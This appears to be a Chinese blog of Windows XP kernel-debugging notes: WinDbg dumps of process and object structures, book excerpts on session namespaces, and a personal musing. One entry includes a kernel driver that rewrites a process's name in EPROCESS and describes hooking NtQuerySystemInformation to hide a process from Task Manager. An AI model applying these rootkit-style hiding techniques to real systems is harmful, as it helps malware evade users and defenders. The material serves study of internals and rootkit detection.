    CommitCharge                      419

        THREAD 80d7a508  Cid 0264.0268  Teb: 7ffde000 Win32Thread: e15df2f8 WAIT: (DelayExecution) UserMode Non-Alertable
            80d7a5f8  NotificationTimer
        Not impersonating
        DeviceMap                 e10000d8
        Owning Process            80d7a780       Image:         savedump.exe
        Wait Start TickCount      17199          Ticks: 895 (0:00:00:13.984)
        Context Switch Count      58                 LargeStack
        UserTime                  00:00:00.0000
        KernelTime                00:00:00.0109
        Start Address 0×77e6149f
        Win32 Start Address 0×010040ed
        Stack Init f9f3b000 Current f9f3acbc Base f9f3b000 Limit f9f37000 Call 0
        Priority 2 BasePriority 2 PriorityDecrement 0 DecrementCount 16
        ChildEBP RetAddr 
        f9f3acd4 804ecd36 nt!KiSwapContext+0×2e (FPO: [Uses EBP] [0,0,4])
        f9f3ace0 804ed393 nt!KiSwapThread+0×44 (FPO: [0,0,2])
        f9f3ad0c 80581778 nt!KeDelayExecutionThread+0×1c7 (FPO: [Non-Fpo])
        f9f3ad54 804db140 nt!NtDelayExecution+0×87 (FPO: [Non-Fpo])
        f9f3ad54 7ffe0304 nt!KiSystemService+0xc4 (FPO: [0,0] TrapFrame @ f9f3ad64)
        0006eac8 00000000 SharedUserData!SystemCallStub+0×4 (FPO: [0,0,0])

2005年09月12日

回到学校的时候,听到喇叭里在讲故事,佛在问一个蜘蛛什么是最珍贵的,,只听到了这么一句.心里想佛又懂得什么,我也不懂得佛,,什么是最珍贵的,也许是失去的.佛失去了所有吗?谁由能比较出那个最珍贵的?该是最珍贵的就该是它,即使还没有失去,大概也没有谁为了证明其最珍贵而故意失去,那样的话也就谈不上珍贵了.也许是最难得到的,但总有未被得到的,那个最珍贵在被得到后又会是怎样的珍贵呢?如果人这一辈子只有精力去得到一样,就必须做出选择,在得到或得不到之前明白了哪个是最珍贵的.如果后悔了,永远也得不到最珍贵的了.每一个都很珍贵,我是说"每一个".你可以得到一块石头,但你无法得到每一块石头;你可以得到一片树叶,但你无法得到每一片树叶.不过人还是很幸运的,至少有机会懂得什么是得到.所以要选择那个唯一的,得到她,就得到了全部.因为这世界里只有这一个她,再没有比她自己更相象的了.如果存在生死轮回那一套,她就是还会出现的,在若干年后或着若干年前,并不会因为性格,相貌的改变而失去她的珍贵.如果说是注定的那个人,说好要永远照顾她,就无论在何时何地,若是相隔太久她忘记了,唤回过会或者将来的记忆.

嘿嘿,又乱发飙了,活的都不知道自己到底是个什么样的人了

2005年09月11日

进程是个object,它的Object body就是_EPROCESS,其他的也同样
kd> !process 4 0
Searching for Process with Cid == 4
PROCESS 80f10020  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00039000  ObjectTable: e1001d10  HandleCount: 186.
    Image: System

kd> dt _EPROCESS 80f10020
   +0×000 Pcb              : _KPROCESS
   +0×06c ProcessLock      : _EX_PUSH_LOCK
   +0×070 CreateTime       : _LARGE_INTEGER 0×0
   +0×078 ExitTime         : _LARGE_INTEGER 0×0
   +0×080 RundownProtect   : _EX_RUNDOWN_REF
   +0×084 UniqueProcessId  : 0×00000004
   +0×088 ActiveProcessLinks : _LIST_ENTRY [ 0x80daa350 - 0x8054ee78 ]
   +0×090 QuotaUsage       : [3] 0
   +0×09c QuotaPeak        : [3] 0
   +0×0a8 CommitCharge     : 7
   +0×0ac PeakVirtualSize  : 0×27b000
   +0×0b0 VirtualSize      : 0×1bf000
   +0×0b4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0×0bc DebugPort        : (null)
   +0×0c0 ExceptionPort    : (null)
   +0×0c4 ObjectTable      : 0xe1001d10
   +0×0c8 Token            : _EX_FAST_REF
   +0×0cc WorkingSetLock   : _FAST_MUTEX
   +0×0ec WorkingSetPage   : 0
   +0×0f0 AddressCreationLock : _FAST_MUTEX
   +0×110 HyperSpaceLock   : 0
   +0×114 ForkInProgress   : (null)
   +0×118 HardwareTrigger  : 0
   +0×11c VadRoot          : 0×80f0a5a0
   +0×120 VadHint          : 0xffb8e390
   +0×124 CloneRoot        : (null)
   +0×128 NumberOfPrivatePages : 3
   +0×12c NumberOfLockedPages : 0
   +0×130 Win32Process     : (null)
   +0×134 Job              : (null)
   +0×138 SectionObject    : (null)
   +0×13c SectionBaseAddress : (null)
   +0×140 QuotaBlock       : 0×8054ef20
   +0×144 WorkingSetWatch  : (null)
   +0×148 Win32WindowStation : (null)
   +0×14c InheritedFromUniqueProcessId : (null)
   +0×150 LdtInformation   : (null)
   +0×154 VadFreeHint      : (null)
   +0×158 VdmObjects       : (null)
   +0×15c DeviceMap        : 0xe10000d8
   +0×160 PhysicalVadList  : _LIST_ENTRY [ 0x80f10180 - 0x80f10180 ]
   +0×168 PageDirectoryPte : _HARDWARE_PTE_X86
   +0×168 Filler           : 0
   +0×170 Session          : (null)
   +0×174 ImageFileName    : [16]  "System"
   +0×184 JobLinks         : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0×18c LockedPagesList  : (null)
   +0×190 ThreadListHead   : _LIST_ENTRY [ 0x80f10fd4 - 0xffb21aec ]
   +0×198 SecurityPort     : 0xe162eef0
   +0×19c PaeTop           : (null)
   +0×1a0 ActiveThreads    : 0×31
   +0×1a4 GrantedAccess    : 0×1f0fff
   +0×1a8 DefaultHardErrorProcessing : 1
   +0×1ac LastThreadExitStatus : 0
   +0×1b0 Peb              : (null)
   +0×1b4 PrefetchTrace    : _EX_FAST_REF
   +0×1b8 ReadOperationCount : _LARGE_INTEGER 0×52
   +0×1c0 WriteOperationCount : _LARGE_INTEGER 0xc1
   +0×1c8 OtherOperationCount : _LARGE_INTEGER 0xb5a
   +0×1d0 ReadTransferCount : _LARGE_INTEGER 0×5b48a
   +0×1d8 WriteTransferCount : _LARGE_INTEGER 0×16c0d2
   +0×1e0 OtherTransferCount : _LARGE_INTEGER 0×43e9f
   +0×1e8 CommitChargeLimit : 0
   +0×1ec CommitChargePeak : 0×1c4
   +0×1f0 AweInfo          : (null)
   +0×1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
   +0×1f8 Vm               : _MMSUPPORT
   +0×238 LastFaultCount   : 0
   +0×23c ModifiedPageCount : 0×54e
   +0×240 NumberOfVads     : 4
   +0×244 JobStatus        : 0
   +0×248 Flags            : 0×40000
   +0×248 CreateReported   : 0y0
   +0×248 NoDebugInherit   : 0y0
   +0×248 ProcessExiting   : 0y0
   +0×248 ProcessDelete    : 0y0
   +0×248 Wow64SplitPages  : 0y0
   +0×248 VmDeleted        : 0y0
   +0×248 OutswapEnabled   : 0y0
   +0×248 Outswapped       : 0y0
   +0×248 ForkFailed       : 0y0
   +0×248 HasPhysicalVad   : 0y0
   +0×248 AddressSpaceInitialized : 0y00
   +0×248 SetTimerResolution : 0y0
   +0×248 BreakOnTermination : 0y0
   +0×248 SessionCreationUnderway : 0y0
   +0×248 WriteWatch       : 0y0
   +0×248 ProcessInSession : 0y0
   +0×248 OverrideAddressSpace : 0y0
   +0×248 HasAddressSpace  : 0y1
   +0×248 LaunchPrefetched : 0y0
   +0×248 InjectInpageErrors : 0y0
   +0×248 Unused           : 0y00000000000 (0)
   +0×24c ExitStatus       : 259
   +0×250 NextPageColor    : 0×3677
   +0×252 SubSystemMinorVersion : 0 ”
   +0×253 SubSystemMajorVersion : 0 ”
   +0×252 SubSystemVersion : 0
   +0×254 PriorityClass    : 0×2 ”
   +0×255 WorkingSetAcquiredUnsafe : 0 ”

kd> !object 80f10020
Object: 80f10020  Type: (80f446f8) Process
    ObjectHeader: 80f10008
    HandleCount: 2  PointerCount: 58

很清楚了

type也是一种object,
kd> dt _OBJECT_HEADER 80f10008
   +0×000 PointerCount     : 58
   +0×004 HandleCount      : 2
   +0×004 NextToFree       : 0×00000002
   +0×008 Type             : 0×80f446f8
   +0×00c NameInfoOffset   : 0 ”
   +0×00d HandleInfoOffset : 0 ”
   +0×00e QuotaInfoOffset  : 0 ”
   +0×00f Flags            : 0×22 ‘"’
   +0×010 ObjectCreateInfo : 0×8054ef20
   +0×010 QuotaBlockCharged : 0×8054ef20
   +0×014 SecurityDescriptor : 0xe1000714
   +0×018 Body             : _QUAD

kd> !object 0×80f446f8
Object: 80f446f8  Type: (80f44e70) Type
    ObjectHeader: 80f446e0
    HandleCount: 0  PointerCount: 1
    Directory Object: e1001510  Name: Process

还有类型为type的type :>

kd> dt _OBJECT_HEADER 80f446e0
   +0×000 PointerCount     : 1
   +0×004 HandleCount      : 0
   +0×004 NextToFree       : (null)
   +0×008 Type             : 0×80f44e70
   +0×00c NameInfoOffset   : 0×20 ‘ ‘
   +0×00d HandleInfoOffset : 0 ”
   +0×00e QuotaInfoOffset  : 0 ”
   +0×00f Flags            : 0×17 ”
   +0×010 ObjectCreateInfo : (null)
   +0×010 QuotaBlockCharged : (null)
   +0×014 SecurityDescriptor : (null)
   +0×018 Body             : _QUAD
kd> !object 0×80f44e70
Object: 80f44e70  Type: (80f44e70) Type
    ObjectHeader: 80f44e58
    HandleCount: 0  PointerCount: 1
    Directory Object: e1001510  Name: Type


不同type的object,包含的Method也不同

kd> !object 0×80f44e70
Object: 80f44e70  Type: (80f44e70) Type
    ObjectHeader: 80f44e58
    HandleCount: 0  PointerCount: 1
    Directory Object: e1001510  Name: Type
kd> dt _OBJECT_TYPE 0×80f44e70
   +0×000 Mutex            : _ERESOURCE
   +0×038 TypeList         : _LIST_ENTRY [ 0x80f44e48 - 0x80f3ee48 ]
   +0×040 Name             : _UNICODE_STRING "Type"
   +0×048 DefaultObject    : 0×8054e4e0
   +0×04c Index            : 1
   +0×050 TotalNumberOfObjects : 0×1d
   +0×054 TotalNumberOfHandles : 0
   +0×058 HighWaterNumberOfObjects : 0×1d
   +0×05c HighWaterNumberOfHandles : 0
   +0×060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0×0ac Key              : 0×546a624f
   +0×0b0 ObjectLocks      : [4] _ERESOURCE
kd> dt _OBJECT_TYPE_INITIALIZER 0×80f44e70+60
   +0×000 Length           : 0×4c
   +0×002 UseDefaultObject : 0×1 ”
   +0×003 CaseInsensitive  : 0 ”
   +0×004 InvalidAttributes : 0×100
   +0×008 GenericMapping   : _GENERIC_MAPPING
   +0×018 ValidAccessMask  : 0×1f0001
   +0×01c SecurityRequired : 0 ”
   +0×01d MaintainHandleCount : 0 ”
   +0×01e MaintainTypeList : 0×1 ”
   +0×020 PoolType         : 0 ( NonPagedPool )
   +0×024 DefaultPagedPoolCharge : 0
   +0×028 DefaultNonPagedPoolCharge : 0×1c0
   +0×02c DumpProcedure    : (null)
   +0×030 OpenProcedure    : (null)
   +0×034 CloseProcedure   : (null)
   +0×038 DeleteProcedure  : 0×8060d698     nt!ObpDeleteObjectType+0
   +0×03c ParseProcedure   : (null)
   +0×040 SecurityProcedure : 0×80586333     nt!SeDefaultObjectMethod+0
   +0×044 QueryNameProcedure : (null)
   +0×048 OkayToCloseProcedure : (null)
kd> dt _OBJECT_TYPE 0×80f446f8
   +0×000 Mutex            : _ERESOURCE
   +0×038 TypeList         : _LIST_ENTRY [ 0x80f44730 - 0x80f44730 ]
   +0×040 Name             : _UNICODE_STRING "Process"
   +0×048 DefaultObject    : (null)
   +0×04c Index            : 5
   +0×050 TotalNumberOfObjects : 0×11
   +0×054 TotalNumberOfHandles : 0×3c
   +0×058 HighWaterNumberOfObjects : 0×13
   +0×05c HighWaterNumberOfHandles : 0×40
   +0×060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0×0ac Key              : 0×636f7250
   +0×0b0 ObjectLocks      : [4] _ERESOURCE
kd> dt _OBJECT_TYPE_INITIALIZER 0×80f446f8+60
   +0×000 Length           : 0×4c
   +0×002 UseDefaultObject : 0 ”
   +0×003 CaseInsensitive  : 0 ”
   +0×004 InvalidAttributes : 0xb0
   +0×008 GenericMapping   : _GENERIC_MAPPING
   +0×018 ValidAccessMask  : 0×1f0fff
   +0×01c SecurityRequired : 0×1 ”
   +0×01d MaintainHandleCount : 0 ”
   +0×01e MaintainTypeList : 0 ”
   +0×020 PoolType         : 0 ( NonPagedPool )
   +0×024 DefaultPagedPoolCharge : 0×1000
   +0×028 DefaultNonPagedPoolCharge : 0×288
   +0×02c DumpProcedure    : (null)
   +0×030 OpenProcedure    : (null)
   +0×034 CloseProcedure   : (null)
   +0×038 DeleteProcedure  : 0×805930f2     nt!PspProcessDelete+0
   +0×03c ParseProcedure   : (null)
   +0×040 SecurityProcedure : 0×80586333     nt!SeDefaultObjectMethod+0
   +0×044 QueryNameProcedure : (null)
   +0×048 OkayToCloseProcedure : (null)

object type里包含一些对这种object的操作

kernel hAndle tAble
kd> x /t/v nt!ObpKernelHandleTable
pub global 8054e558    0 <NoType> nt!ObpKernelHandleTable = <no type information>


在windows下建多个用户,然后在用用户快速切换的时候,sectionID会表示进程属于那个section

kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS 80f10020  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00039000  ObjectTable: e1001d10  HandleCount: 191.
    Image: System

PROCESS 80daa2c8  SessionId: none  Cid: 016c    Peb: 7ffdf000  ParentCid: 0004
    DirBase: 05825000  ObjectTable: e12d9708  HandleCount:  26.
    Image: smss.exe

PROCESS 80dc1020  SessionId: 0  Cid: 01fc    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 061ee000  ObjectTable: e13b06c8  HandleCount: 327.
    Image: csrss.exe

PROCESS 80db0020  SessionId: 0  Cid: 0214    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 06573000  ObjectTable: e138b940  HandleCount: 452.
    Image: winlogon.exe

PROCESS 80d96240  SessionId: 0  Cid: 024c    Peb: 7ffdf000  ParentCid: 0214
    DirBase: 069e5000  ObjectTable: e15e2c10  HandleCount: 284.
    Image: services.exe

PROCESS 80db3a88  SessionId: 0  Cid: 0258    Peb: 7ffdf000  ParentCid: 0214
    DirBase: 06931000  ObjectTable: e15faeb8  HandleCount: 307.
    Image: lsass.exe

PROCESS ffba98d8  SessionId: 0  Cid: 0358    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 06f75000  ObjectTable: e13a16a0  HandleCount: 185.
    Image: svchost.exe

PROCESS ffba1278  SessionId: 0  Cid: 03ec    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 0703d000  ObjectTable: e16385a8  HandleCount: 997.
    Image: svchost.exe

PROCESS ffb8cb30  SessionId: 0  Cid: 048c    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 0891e000  ObjectTable: e157a520  HandleCount:  48.
    Image: svchost.exe

PROCESS ffb85570  SessionId: 0  Cid: 04ac    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 08ae5000  ObjectTable: e139f450  HandleCount: 133.
    Image: svchost.exe

PROCESS ffb6b3c0  SessionId: 0  Cid: 05bc    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 093b8000  ObjectTable: e186b078  HandleCount: 116.
    Image: spoolsv.exe

PROCESS ffb4fda8  SessionId: 0  Cid: 0678    Peb: 7ffdf000  ParentCid: 063c
    DirBase: 09c03000  ObjectTable: e17da8a8  HandleCount: 248.
    Image: explorer.exe

PROCESS ffb1dda8  SessionId: 0  Cid: 072c    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 09f49000  ObjectTable: e15a9af8  HandleCount:  42.
    Image: VMwareService.exe

PROCESS ffaf0020  SessionId: 0  Cid: 0308    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0aba3000  ObjectTable: e18c8060  HandleCount:  33.
    Image: VMwareTray.exe

PROCESS ffaed8d8  SessionId: 0  Cid: 0348    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0ae03000  ObjectTable: e15f6b88  HandleCount:  37.
    Image: VMwareUser.exe

PROCESS ffaeada8  SessionId: 0  Cid: 036c    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0af96000  ObjectTable: e17c0440  HandleCount:  62.
    Image: ctfmon.exe

PROCESS ffaa8da8  SessionId: 0  Cid: 06ec    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0c16d000  ObjectTable: e1a04b00  HandleCount:  21.
    Image: cmd.exe

PROCESS 80f26020  SessionId: 0  Cid: 06f4    Peb: 7ffdf000  ParentCid: 06ec
    DirBase: 0c28d000  ObjectTable: e179f6a8  HandleCount:  23.
    Image: conime.exe

PROCESS 80e92b30  SessionId: 1  Cid: 01c0    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 00cf8000  ObjectTable: e13ae918  HandleCount: 115.
    Image: csrss.exe

PROCESS 80e8b020  SessionId: 1  Cid: 04f0    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 00e7f000  ObjectTable: e1822530  HandleCount: 212.
    Image: winlogon.exe

PROCESS 80e62020  SessionId: 1  Cid: 0780    Peb: 7ffdf000  ParentCid: 0574
    DirBase: 06ce0000  ObjectTable: e155cf00  HandleCount: 257.
    Image: explorer.exe

PROCESS ffa83c70  SessionId: 0  Cid: 0070    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 07a62000  ObjectTable: e17f7a78  HandleCount: 100.
    Image: msiexec.exe

PROCESS ffa56410  SessionId: 1  Cid: 019c    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 08d76000  ObjectTable: e1827ee0  HandleCount:  39.
    Image: imjpmig.exe

PROCESS ffa542a0  SessionId: 1  Cid: 018c    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 09067000  ObjectTable: e1ab51a8  HandleCount:  36.
    Image: VMwareTray.exe

PROCESS ffa424c0  SessionId: 1  Cid: 02c8    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 0c981000  ObjectTable: e15e20d8  HandleCount:  34.
    Image: VMwareUser.exe

PROCESS ffa4e4f8  SessionId: 1  Cid: 0200    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 0c21f000  ObjectTable: e179ed70  HandleCount:  59.
    Image: ctfmon.exe

PROCESS ffa4ec10  SessionId: 0  Cid: 038c    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 0767e000  ObjectTable: e1e633c0  HandleCount:  94.
    Image: imapi.exe

并且用winobj查看Sessions目录下多出了个1,里面有DosDevices,Windows,BAseNAmedObjects三个目录,是

从原来的复制过来的

Session Namespace(from inside windows 4th)
Windows NT was originally written with the assumption that only one user would log on to the

system interactively and that the system would run only one instance of any interactive

application. The addition of Windows Terminal Services in Windows 2000 Server and fast user

switching in Windows XP changed these assumptions, thus requiring changes to the object

manager namespace model to support multiple users. (For a basic description of terminal

services and sessions, see Chapter 1.)

A user logged on to the console session has access to the global namespace, a namespace that

serves as the first instance of the namespace. Additional sessions are given a session-

private view of the namespace known as a local namespace. The parts of the namespace that

are localized for each session include \DosDevices, \Windows, and \BaseNamedObjects. Making

separate copies of the same parts of the namespace is known as instancing the namespace.

Instancing \DosDevices makes it possible for each user to have different network drive

letters and Windows objects such as serial ports. On Windows 2000, the global \DosDevices

directory is named \?? and is the directory to which the \DosDevices symbolic link points,

and local \DosDevices directories are identified by the session id for the terminal server

session. On Windows XP and later, the global \DosDevices directory is named \Global?? and is

the directory to which \DosDevices points, and local \DosDevices directories are identified

by the logon session ID.

The \Windows directory is where Win32k.sys creates the interactive window station, \WinSta0.

A Terminal Services environment can support multiple interactive users, but each user needs

an individual version of WinSta0 to preserve the illusion that he or she is accessing the

predefined interactive window station in Windows. Finally, applications and the system

create shared objects in \BaseNamedObjects, including events, mutexes, and memory sections.

If two users are running an application that creates a named object, each user session must

have a private version of the object so that the two instances of the application don’t

interfere with one another by accessing the same object.

The object manager implements a local namespace by creating the private versions of the

three directories mentioned under a directory associated with the user’s session under

\Sessions\X (where X is the session identifier). When a Windows application in remote

session two creates a named event, for example, the object manager transparently redirects

the object’s name from \BaseNamedObjects to \Sessions\2\BaseNamedObjects.

All object manager functions related to namespace management are aware of the instanced

directories and participate in providing the illusion that nonconsole sessions use the same

namespace as the console session. Windows subsystem DLLs prefix names passed by Windows

applications that reference objects in \DosDevices with \?? (for example, C:\Windows becomes

\??\C:\Windows). When the object manager sees the special \?? prefix, the steps it takes

depends on the version of Windows, but it always relies on a field named DeviceMap in the

executive process object (EPROCESS, which is described further in Chapter 6) that points to

a data structure shared by other processes in the same session. The DosDevicesDirectory

field of the DeviceMap structure points at the object manager directory that represents the

process’s local \DosDevices. The target directory varies depending on the system:

If the system is Windows 2000 and Terminal Services are not installed, the

DosDevicesDirectory field of the DeviceMap structure of the process points at the \??

directory because there are no local namespaces.

If the system is Windows 2000 and Terminal Services are installed, when a new session

becomes active the system copies all the objects from the global \?? directory into the

session’s local \Devices directory and the DosDevicesDirectory field of the DeviceMap

structure points at the local directory.

On Windows XP and Windows Server 2003, the system does not make copies of global objects in

the local DosDevices directories. When the object manager sees a reference to \??, it

locates the process’s local \DosDevices by using the DosDevicesDirectory field of the

DeviceMap. If the object manager doesn’t find the object in that directory, it checks the

DeviceMap field of the directory object, and if it’s valid it looks for the object in the

directory pointed to by the GlobalDosDevicesDirectory field of the DeviceMap structure,

which is always \Global??.

Under certain circumstances, applications that are Terminal Services–aware need to access

objects in the console session even if the application is running in a remote session. The

application might want to do this to synchronize with instances of itself running in other

remote sessions or with the console session. For these cases, the object manager provides

the special override "\Global" that an application can prefix to any object name to access

the global namespace. For example, an application in session two opening an object named

\Global\ApplicationInitialized is directed to \BasedNamedObjects\ApplicationInitialized

instead of \Sessions\2\BaseNamedObjects\ApplicationInitialized.

On Windows XP and Windows Server 2003, an application that wants to access an object in the

global \DosDevices directory does not need to use the \Global prefix as long as the object

doesn’t exist in its local \DosDevices directory. This is because the object manager will

automatically look in the global directory for the object if it doesn’t find it in the local

directory. However, an application running on Windows 2000 with Terminal Services must

always specify the \Global prefix to access objects in the global \DosDevices directory.

Table 3-8. Standard Object Directories

Directory

Types of Object Names Stored

\GLOBAL?? (\?? in Windows 2000)

MS-DOS device names (\DosDevices is a symbolic link to this directory.)

\BaseNamedObjects

Mutexes, events, semaphores, waitable timers, and section objects

\Callback

Callback objects

\Device

Device objects

\Driver

Driver objects

\FileSystem

File system driver objects and file system recognizer device objects

\KnownDlls

Section names and path for known DLLs (DLLs mapped by the system at startup time)

\Nls

Section names for mapped national language support tables

\ObjectTypes

Names of types of objects

\RPC Control

Port objects used by remote procedure calls (RPCs)

\Security

Names of objects specific to the security subsystem

\Windows

Windows subsystem ports and window stations


Table 3-3. Executive Objects Exposed to the Windows API

Object Type

Represents

Symbolic link

A mechanism for referring to an object name indirectly.

Process

The virtual address space and control information necessary for the execution of a set of thread objects.

Thread

An executable entity within a process.

Job

A collection of processes manageable as a single entity through the job.

Section

A region of shared memory (known as a file mapping object in Windows).

File

An instance of an opened file or an I/O device.

Access token

The security profile (security ID, user rights, and so on) of a process or a thread.

Event

An object with a persistent state (signaled or not signaled) that can be used for synchronization or notification.

Semaphore

A counter that provides a resource gate by allowing some maximum number of threads to access the resources protected by the semaphore.

Mutex*

A synchronization mechanism used to serialize access to a resource.

Timer

A mechanism to notify a thread when a fixed period of time elapses.

IoCompletion

A method for threads to enqueue and dequeue notifications of the completion of I/O operations (known as an I/O completion port in the Windows API).

Key

A mechanism to refer to data in the registry. Although keys appear in the object manager namespace, they are managed by the configuration manager, in a way similar to that in which file objects are managed by file system drivers. Zero or more key values are associated with a key object; key values contain data about the key.

WindowStation

An object that contains a clipboard, a set of global atoms, and a group of desktop objects.

Desktop

An object contained within a window station. A desktop has a logical display surface and contains windows, menus, and hooks.


Note

The executive implements a total of 27 object types in Windows 2000 and 29 on Windows XP and Windows Server 2003. (These newer Windows versions add the DebugObject and KeyedEvent objects.) Many of these objects are for use only by the executive component that defines them and are not directly accessible by Windows APIs. Examples of these objects include Driver, Device, and EventPair.


Note

Externally in the Windows API, mutants are called mutexes. Internally, the kernel object that underlies mutexes is called a mutant.

2005年09月10日

把进程explorer的EPROCESS中的ImAgeFileNAme和SeAuditProcessCreationInfo中的名字全改了,结果windows 任务管理器里面依然写着explorer.exe
#include <ntddk.h>

typedef unsigned long DWORD;

void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);

NTSTATUS DriverEntry (PDRIVER_OBJECT  pDriverObject,
                      PUNICODE_STRING pusRegistryPath);
DWORD FindProcessEPROC (int);

int FLINKOFFSET = 0×088;
int PIDOFFSET = 0×084;

NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject,
      PUNICODE_STRING pusRegistryPAth)
{
 HANDLE hAndle = (HANDLE)0×0000000c;
 DWORD eproc = 0×00000000;
 CHAR* pNAme;
 PUNICODE_STRING pUnicode_NAme;

 pDriverObject->DriverUnload = DriverUnloAd;

 eproc = (DWORD)FindProcessEPROC(228);
 if (eproc == 0×0000000) return 0;

 pNAme = (CHAR*)(eproc + 0×174);
 RtlCopyMemory(pNAme,"shit shit",sizeof("shit shit"));
 //return STATUS_SUCCESS;
 pUnicode_NAme = (PUNICODE_STRING)(*(LONG*)(eproc + 0×1f4));
 RtlCopyMemory(pUnicode_NAme->Buffer,"s\0s\0s\0s\0",sizeof("s\0s\0s\0s\0"));
 DbgPrint("here :>\n\n");

 return STATUS_SUCCESS;
}
//——————————————————————–
//////////////////////////////////////////////////////////////////////////////
// This function was originally written mostly in assembly language. Now let’s
// make it readable to the masses.
DWORD FindProcessEPROC (int terminate_PID)
{
 DWORD eproc       = 0×00000000;
 int   current_PID = 0;
 int   start_PID   = 0;
 int   i_count     = 0;
 PLIST_ENTRY plist_active_procs;

 
 if (terminate_PID == 0)
  return terminate_PID;

 eproc = (DWORD) PsGetCurrentProcess();
 start_PID = *((DWORD*)(eproc+PIDOFFSET));
 current_PID = start_PID;

 while(1)
 {
  if(terminate_PID == current_PID)
   return eproc;
  else if((i_count >= 1) && (start_PID == current_PID))
  {
   return 0×00000000;
  }
  else {
   plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
   eproc = (DWORD) plist_active_procs->Flink;
   eproc = eproc – FLINKOFFSET;
   current_PID = *((int *)(eproc+PIDOFFSET));
   i_count++;
  }
 }
}
//——————————————————————–
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object)
{
}
//——————————————————————–
dumpbin c:\WINDOWS\system32\taskmgr.exe -imports
….
 ntdll.dll
            1001404 Import Address Table
            101209C Import Name Table
           FFFFFFFF time date stamp
           FFFFFFFF Index of first forwarder reference

   77F77974   50F  _chkstk
   77F5E9F6   51C  _snwprintf
   77F526AA   52B  _wcsicmp
   77F9C3A8   322  RtlTimeToElapsedTimeFields
   77F60C44   341  RtlUnwind
   77F758AA    63  NtClose
   77F78A93   564  strrchr
   77F99D5A   2A0  RtlLargeIntegerToChar
   77F51487   18E  RtlAnsiStringToUnicodeString
   77FA6269   526  _ui64tow
   77F6422E   54E  mbstowcs
   77F781B0   552  memmove
   77F76152    FB  NtQuerySystemInformation
   77F647FE   57F  wcstol
   77F765C6   148  NtShutdownSystem
   77F75CA4    A9  NtInitiatePowerAction
   77F75EFA    D2  NtPowerInformation
   77F75EAF    CD  NtOpenThread
…..
调用了NtQuerySystemInformAtion,,奇怪,不应该用户只能用ZwQuerySystemInformAtion么,,
hook 系统服务NtQuerySystemInformAtion后,任务管理器里果然没显示了,但IceSword依然显示,并且用红

字表出进程被隐藏,
可以看出IceWord的第一列ImAgeNAme是用的EPROCESS中的ImAgeFileNAme,后面的全路径不知道从哪里找的

,,而且也不知道NtQuerySystemInformAtion是从哪里得到的进程信息
在进程的object中看看有没有带名字的,列如explorer的
kd> !handle 0 3 ffb67708
processor number 0, process ffb67708
PROCESS ffb67708  SessionId: 0  Cid: 06c0    Peb: 7ffdf000  ParentCid: 0684
    DirBase: 097c3000  ObjectTable: e1600ad0  HandleCount: 270.
    Image: explorer.exe

New version of handle table at e168f000 with 270 Entries in use
0004: Object: e1001078  GrantedAccess: 000f0003
Object: e1001078  Type: (80f0d730) KeyedEvent
    ObjectHeader: e1001060
        HandleCount: 16  PointerCount: 17
        Directory Object: e10015f0  Name: CritSecOutOfMemoryEvent

0008: Object: e13d1f60  GrantedAccess: 00000003
Object: e13d1f60  Type: (80f44ca0) Directory
    ObjectHeader: e13d1f48
        HandleCount: 16  PointerCount: 47
        Directory Object: e1000640  Name: KnownDlls

000c: Object: ffb69078  GrantedAccess: 00100020 (Inherit)
Object: ffb69078  Type: (80f42e70) File
    ObjectHeader: ffb69060
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \Documents and Settings\uty {HarddiskVolume1}

0010: Object: ffb58a18  GrantedAccess: 001f0003 (Protected)
Object: ffb58a18  Type: (80f0e490) Event
    ObjectHeader: ffb58a00
        HandleCount: 1  PointerCount: 2

0014: Object: e13cf030  GrantedAccess: 000f000f
Object: e13cf030  Type: (80f44ca0) Directory
    ObjectHeader: e13cf018
        HandleCount: 15  PointerCount: 19
        Directory Object: e1000640  Name: Windows

0018: Object: e17b1610  GrantedAccess: 001f0001 (Protected)
Object: e17b1610  Type: (80f430b0) Port
    ObjectHeader: e17b15f8
        HandleCount: 1  PointerCount: 17

001c: Object: e1685528  GrantedAccess: 000f003f (Protected)
Object: e1685528  Type: (80f0a350) Key
    ObjectHeader: e1685510
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE

0020: Object: e14cb368  GrantedAccess: 000f001f
Object: e14cb368  Type: (80f0a040) Section
    ObjectHeader: e14cb350
        HandleCount: 15  PointerCount: 16

0024: Object: 80e5b160  GrantedAccess: 000f037f
Object: 80e5b160  Type: (80f0d560) WindowStation
    ObjectHeader: 80e5b148
        HandleCount: 17  PointerCount: 30
        Directory Object: e14fb640  Name: WinSta0

0028: Object: 80e538a0  GrantedAccess: 000f01ff
Object: 80e538a0  Type: (80f0d390) Desktop
    ObjectHeader: 80e53888
